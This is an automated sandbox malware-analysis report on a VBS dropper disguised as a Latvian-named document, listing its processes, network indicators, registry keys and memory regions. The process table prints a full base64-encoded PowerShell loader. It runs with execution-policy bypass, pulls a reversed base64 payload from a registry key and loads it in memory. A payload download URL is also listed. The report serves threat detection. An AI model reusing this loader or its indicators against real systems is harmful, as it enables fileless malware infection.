Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs
|
ASCII text, with very long lines (35174), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12t2j1hg.zvy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lged3gvc.qj3.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://transfer.adttemp.com.br
|
unknown
|
|
|
|
https://transfer.adttemp.com.br
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://transfer.adttemp.com.br/qcExh/99gram.txt
|
104.196.109.209
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.v
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 5 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
transfer.adttemp.com.br
|
104.196.109.209
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.196.109.209
|
transfer.adttemp.com.br
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\NYANxCAT
|
NYANxCAT
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1A9C3610000
|
trusted library section
|
page read and write
|
|
|
|
1A9BB668000
|
trusted library allocation
|
page read and write
|
|
|
|
1A9AB530000
|
trusted library allocation
|
page read and write
|
||
|
1B4F023F000
|
heap
|
page read and write
|
||
|
1B4F01DF000
|
heap
|
page read and write
|
||
|
1B4EE3E5000
|
heap
|
page read and write
|
||
|
1B4F0072000
|
heap
|
page read and write
|
||
|
1B4F0072000
|
heap
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
1B4EE3EE000
|
heap
|
page read and write
|
||
|
1B4F00C5000
|
heap
|
page read and write
|
||
|
1B4F008A000
|
heap
|
page read and write
|
||
|
1B4F02DA000
|
heap
|
page read and write
|
||
|
7FF848E1C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4F0064000
|
heap
|
page read and write
|
||
|
1A9AD3B5000
|
trusted library allocation
|
page read and write
|
||
|
1B4F025E000
|
heap
|
page read and write
|
||
|
1B4F0201000
|
heap
|
page read and write
|
||
|
1A9AD1D4000
|
trusted library allocation
|
page read and write
|
||
|
1A9AB4A0000
|
heap
|
page read and write
|
||
|
1A9A93DF000
|
heap
|
page read and write
|
||
|
33FD33B000
|
stack
|
page read and write
|
||
|
1A9C3630000
|
heap
|
page read and write
|
||
|
7FF848D84000
|
trusted library allocation
|
page read and write
|
||
|
33FCD7D000
|
stack
|
page read and write
|
||
|
1B4F0052000
|
heap
|
page read and write
|
||
|
1A9AB320000
|
heap
|
page execute and read and write
|
||
|
7FF848F1A000
|
trusted library allocation
|
page read and write
|
||
|
1A9A95E0000
|
heap
|
page execute and read and write
|
||
|
1B4EE33F000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
33FD23F000
|
stack
|
page read and write
|
||
|
1A9AD23E000
|
trusted library allocation
|
page read and write
|
||
|
1B4F01E0000
|
heap
|
page read and write
|
||
|
1A9BBC01000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E46000
|
trusted library allocation
|
page execute and read and write
|
||
|
41BC8FE000
|
stack
|
page read and write
|
||
|
1B4F00C5000
|
heap
|
page read and write
|
||
|
1A9AD979000
|
trusted library allocation
|
page read and write
|
||
|
1A9C35B0000
|
heap
|
page execute and read and write
|
||
|
1B4F023F000
|
heap
|
page read and write
|
||
|
1B4F0065000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
1A9AADE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
|
1A9A9580000
|
trusted library allocation
|
page read and write
|
||
|
1A9BB4B1000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
1B4F0092000
|
heap
|
page read and write
|
||
|
41BD0FF000
|
stack
|
page read and write
|
||
|
1B4F00A4000
|
heap
|
page read and write
|
||
|
1A9AB330000
|
heap
|
page read and write
|
||
|
1B4F0073000
|
heap
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
1A9A9330000
|
heap
|
page read and write
|
||
|
1B4F0050000
|
heap
|
page read and write
|
||
|
1B4F01E6000
|
heap
|
page read and write
|
||
|
1B4EE300000
|
heap
|
page read and write
|
||
|
1A9AB4A9000
|
heap
|
page read and write
|
||
|
1B4EE3D4000
|
heap
|
page read and write
|
||
|
1A9BB7DB000
|
trusted library allocation
|
page read and write
|
||
|
1A9BB4C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
1B4F0053000
|
heap
|
page read and write
|
||
|
7FF848D7B000
|
trusted library allocation
|
page read and write
|
||
|
1B4EE250000
|
heap
|
page read and write
|
||
|
7FF848D63000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
1A9C35D0000
|
trusted library allocation
|
page read and write
|
||
|
1B4EE3F9000
|
heap
|
page read and write
|
||
|
1B4EE390000
|
heap
|
page read and write
|
||
|
1A9A9471000
|
heap
|
page read and write
|
||
|
1A9A9370000
|
heap
|
page read and write
|
||
|
1A9C375F000
|
heap
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
1B4EE230000
|
heap
|
page read and write
|
||
|
1A9A95C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
33FDD8E000
|
stack
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
1B4F0208000
|
heap
|
page read and write
|
||
|
1B4EE5F5000
|
heap
|
page read and write
|
||
|
1A9A95A0000
|
trusted library allocation
|
page read and write
|
||
|
1B4F0054000
|
heap
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
1B4F00C5000
|
heap
|
page read and write
|
||
|
1A9A93E7000
|
heap
|
page read and write
|
||
|
1B4F01BC000
|
heap
|
page read and write
|
||
|
33FDCC2000
|
stack
|
page read and write
|
||
|
1A9A95B0000
|
heap
|
page readonly
|
||
|
1B4F045E000
|
heap
|
page read and write
|
||
|
1A9AD97C000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
1B4EE336000
|
heap
|
page read and write
|
||
|
1B4F0081000
|
heap
|
page read and write
|
||
|
1B4F015E000
|
heap
|
page read and write
|
||
|
33FDE0D000
|
stack
|
page read and write
|
||
|
41BCAFF000
|
stack
|
page read and write
|
||
|
33FCCFF000
|
stack
|
page read and write
|
||
|
1A9C3710000
|
heap
|
page read and write
|
||
|
1B4F0251000
|
heap
|
page read and write
|
||
|
41BCFFB000
|
stack
|
page read and write
|
||
|
1B4EE330000
|
heap
|
page read and write
|
||
|
1B4EE3F8000
|
heap
|
page read and write
|
||
|
7FF848D6D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F11000
|
trusted library allocation
|
page read and write
|
||
|
1B4EE39D000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
1A9A93A0000
|
heap
|
page read and write
|
||
|
1A9C34D0000
|
heap
|
page read and write
|
||
|
1B4EE3FC000
|
heap
|
page read and write
|
||
|
1A9AB327000
|
heap
|
page execute and read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
1A9AB3E0000
|
heap
|
page read and write
|
||
|
1B4F0062000
|
heap
|
page read and write
|
||
|
1A9AB4B1000
|
trusted library allocation
|
page read and write
|
||
|
1B4F0450000
|
heap
|
page read and write
|
||
|
1A9C3747000
|
heap
|
page read and write
|
||
|
33FDE89000
|
stack
|
page read and write
|
||
|
1B4EE32C000
|
heap
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
|
41BCDFD000
|
stack
|
page read and write
|
||
|
1A9AD0F3000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
41BC7FE000
|
stack
|
page read and write
|
||
|
1A9C3A00000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
1B4F020F000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
1A9AB37A000
|
heap
|
page read and write
|
||
|
1B4F01BB000
|
heap
|
page read and write
|
||
|
1B4EE346000
|
heap
|
page read and write
|
||
|
41BCCFE000
|
stack
|
page read and write
|
||
|
33FCEFE000
|
stack
|
page read and write
|
||
|
1A9A9570000
|
trusted library section
|
page read and write
|
||
|
1B4F00B5000
|
heap
|
page read and write
|
||
|
1A9AAF85000
|
heap
|
page read and write
|
||
|
1B4EE3FE000
|
heap
|
page read and write
|
||
|
1B4F0494000
|
heap
|
page read and write
|
||
|
1B4EE34D000
|
heap
|
page read and write
|
||
|
1B4F01E5000
|
heap
|
page read and write
|
||
|
1B4EE32B000
|
heap
|
page read and write
|
||
|
1A9AD1BA000
|
trusted library allocation
|
page read and write
|
||
|
1B4EFD00000
|
heap
|
page read and write
|
||
|
33FDF8A000
|
stack
|
page read and write
|
||
|
1A9A9600000
|
heap
|
page read and write
|
||
|
1A9A9427000
|
heap
|
page read and write
|
||
|
1A9A9605000
|
heap
|
page read and write
|
||
|
1B4F01FC000
|
heap
|
page read and write
|
||
|
33FDD0F000
|
stack
|
page read and write
|
||
|
1B4EE39D000
|
heap
|
page read and write
|
||
|
7FF848D8B000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
1A9AB3AD000
|
heap
|
page read and write
|
||
|
1A9ABEAA000
|
trusted library allocation
|
page read and write
|
||
|
1B4F0495000
|
heap
|
page read and write
|
||
|
1B4F01EC000
|
heap
|
page read and write
|
||
|
1B4F02DB000
|
heap
|
page read and write
|
||
|
1A9A9300000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
1A9C36C0000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
1B4F01FC000
|
heap
|
page read and write
|
||
|
7FF848DBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4EE3DE000
|
heap
|
page read and write
|
||
|
1B4F0081000
|
heap
|
page read and write
|
||
|
1B4EE336000
|
heap
|
page read and write
|
||
|
1B4F007A000
|
heap
|
page read and write
|
||
|
7FF848E16000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A9A9310000
|
heap
|
page read and write
|
||
|
1B4F0250000
|
heap
|
page read and write
|
||
|
1B4EE32F000
|
heap
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
1A9A93E9000
|
heap
|
page read and write
|
||
|
1A9C3758000
|
heap
|
page read and write
|
||
|
1B4F0073000
|
heap
|
page read and write
|
||
|
1A9BB520000
|
trusted library allocation
|
page read and write
|
||
|
1B4F01FC000
|
heap
|
page read and write
|
||
|
1A9A93FF000
|
heap
|
page read and write
|
||
|
1A9BBC39000
|
trusted library allocation
|
page read and write
|
||
|
1B4F0062000
|
heap
|
page read and write
|
||
|
1A9ACC03000
|
trusted library allocation
|
page read and write
|
||
|
1B4EE150000
|
heap
|
page read and write
|
||
|
41BCEFE000
|
stack
|
page read and write
|
||
|
1A9C35D3000
|
trusted library allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
1A9AAF80000
|
heap
|
page read and write
|
||
|
1A9AB41D000
|
heap
|
page read and write
|
||
|
1B4F01DE000
|
heap
|
page read and write
|
||
|
7DF4CDF40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4F0218000
|
heap
|
page read and write
|
||
|
1B4F0051000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
1B4EE384000
|
heap
|
page read and write
|
||
|
33FCDFF000
|
stack
|
page read and write
|
||
|
1B4F0150000
|
heap
|
page read and write
|
||
|
1B4F02A3000
|
heap
|
page read and write
|
||
|
1A9AC9BD000
|
trusted library allocation
|
page read and write
|
||
|
1A9A93EB000
|
heap
|
page read and write
|
||
|
7FF849190000
|
trusted library allocation
|
page read and write
|
||
|
1A9AB661000
|
trusted library allocation
|
page read and write
|
||
|
1A9AAE28000
|
heap
|
page read and write
|
||
|
33FC8D3000
|
stack
|
page read and write
|
||
|
1A9AD334000
|
trusted library allocation
|
page read and write
|
||
|
1B4EE3D7000
|
heap
|
page read and write
|
||
|
1B4EE336000
|
heap
|
page read and write
|
||
|
1B4F0052000
|
heap
|
page read and write
|
||
|
1A9C36B0000
|
heap
|
page read and write
|
||
|
1A9AB3F0000
|
heap
|
page read and write
|
||
|
1A9AD215000
|
trusted library allocation
|
page read and write
|
||
|
1A9AD83D000
|
trusted library allocation
|
page read and write
|
||
|
1A9AD0D9000
|
trusted library allocation
|
page read and write
|
||
|
1B4F0451000
|
heap
|
page read and write
|
||
|
1A9ABFBD000
|
trusted library allocation
|
page read and write
|
||
|
1A9A9390000
|
trusted library section
|
page read and write
|
||
|
41BC6DA000
|
stack
|
page read and write
|
||
|
7FF848F42000
|
trusted library allocation
|
page read and write
|
||
|
1A9AD105000
|
trusted library allocation
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
1A9AD988000
|
trusted library allocation
|
page read and write
|
||
|
1A9AB33B000
|
heap
|
page read and write
|
||
|
1A9A942C000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D64000
|
trusted library allocation
|
page read and write
|
||
|
1B4EE5F0000
|
heap
|
page read and write
|
||
|
1B4F0073000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
1A9AD101000
|
trusted library allocation
|
page read and write
|
||
|
1B4F01FC000
|
heap
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
33FCE7E000
|
stack
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
1B4F023F000
|
heap
|
page read and write
|
||
|
1B4F0092000
|
heap
|
page read and write
|
||
|
1B4EE3F8000
|
heap
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
1A9BB53C000
|
trusted library allocation
|
page read and write
|
There are 241 hidden memdumps, click here to show them.